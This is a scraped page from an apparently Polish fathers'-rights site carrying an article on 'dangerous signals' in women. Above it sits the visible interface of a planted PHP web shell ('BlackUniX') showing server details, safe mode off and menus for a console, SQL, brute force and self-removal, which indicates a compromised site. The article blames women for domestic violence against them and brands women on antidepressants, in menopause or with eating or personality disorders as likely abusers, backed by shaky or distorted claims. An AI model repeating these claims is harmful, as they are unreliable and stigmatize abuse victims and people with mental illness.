W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-20 11:08:01
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.198.158.24
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Niebezpieczne sygnały
04.09.2008.
Jeżeli chcemy kontrolować przemoc domową i nadużycia popełniane przez mężczyzn, musimy najpierw rozpoznać i zdefiniować kobiece archetypy, które uruchamiają takie zachowania.

 

"Kobieta podatne na agresję" narzeka, że jest niewinną ofiarą męskiej przemocy i agresji za każdym razem, kiedy wiąże się z mężczyzną. Taka kobieta jest faktycznie ofiarą swojej własnej przemocy i agresji. Pizzey (1998), która z resztą wcześniej zajmowała się kobietami będącymi ofiarami męskiej agresji dostarczyła poważnych dowodów, na to, że jest to forma uzależnienia od przemocy.

Molestowanie w dzieciństwie: Kobieta, która była (fizycznie, lub seksualnie) molestowana w dzieciństwie, szczególnie jako nastolatka jest "najlepszą kandydatką" do bycia obelżywą w dorosłym życiu.

Sygnałem alarmowym jest powtarzające się sytuacje, kiedy okazuje się, że partner nie jest w stanie niczego dobrze wykonać. Coś, co wydawało się kochającą, opiekuńczą osobą, staje się wstrętnym babsztylem, który krytykuje każda podejmowaną przez niego aktywność. A z czasem może nawet zacząć bić, popychać, czy rzucać przedmiotami. Takie zmiany osobowościowe mogą być symptomami problemów ze zdrowiem (np. psychicznym), które wymagałyby leczenia.

Kobieta, która bije i rzuca przedmiotami: z pozoru wydaje się oczywiste. Mężczyźni często traktują takie zachowania jako słodkie, jako część zabawy. W jednym z college' ów przeprowadzono badania. 20% mężczyzn którzy byli atakowani przez swoje dziewczyny, uważało te incydenty za zabawne.

Kobiety z problemami alkoholowymi / z narkotykami. Pisząc o problemach z narkotykami nie mamy na myśli tylko nielegalnych substancji. Kobiety, które zażywają leki, zwłaszcza antydepresanty, czy nawet różne leki dostępne bez recepty mogą być niebezpieczne. Takie nałogi często skrywają głęboko zakorzenione psychozy.

Zaburzenia odżywiania. Jest tajemnicą Poliszynela, że wiele kobiet cierpi na zaburzenia odżywiana. Bulimia i anoreksja zaczynają być epidemią wśród amerykańskich kobiet. Ma to przełożenie również na agresję. Biologicznie biorąc, człowiek musi przetrwać. Więc jeśli jest głodny staje się agresywny, tak by w razie potrzeby mógł zabić i w ten sposób zdobyć pożywienie.
Zaburzenia odżywiania mogą również współistnieć z BPD (osobowością borderline)


Osobowość borderline (pograniczna) BPD. Naukowcy Dutton and Golant (1995, p. 140-155) i Gelles (1997, p. 80) odkryli dodatnią korelację między występowaniem osobowości borderline i sprawcami domowej przemocy. Szacuje się, że BPD stanowi:
~2% ogólnej populacji.
10% wszystkich psychiatrycznych pacjentów ambulatoryjnych;
20% pacjentów hospitalizowanych;

75% z tych zdiagnozowanych przypadków BPD to kobiety; a 75% z nich było fizycznie, albo seksualnie molestowanych.

Inne choroby psychiczne. Z nasileniem zachowań agresywnych może wiązać się również wiele innych zaburzeń natury psychicznej: psychoza dwubiegunowa, narcyzm, deficyt uwagi, konsekwencje niektórych uszkodzeń mózgu a także oczywiście psychopatie. Ważnymi wskaźnikami  zaburzeń psychopatycznych są:
-deficyt uwagi
-deficyt lęku
-patologiczne kłamstwo
-skłonność do manipulowania ludźmi
-brawura

Menopauza. Około 10-15% kobiet cierpi na ciężkie fizyczne lub emocjonalne problemy przechodząc menopauzę. Przeciętny wiek kiedy to się zaczyna to 43 lata, ale może pojawić się w tak młodym wieku jak 35. Usunięcie macicy, lub chirurgiczna menopauza również może być związana z problemami emocjonalnymi - w tym z agresywnymi zachowaniami.

 

Źródło

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy potrzebna jest partia mężczyzn?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


20.06.2018.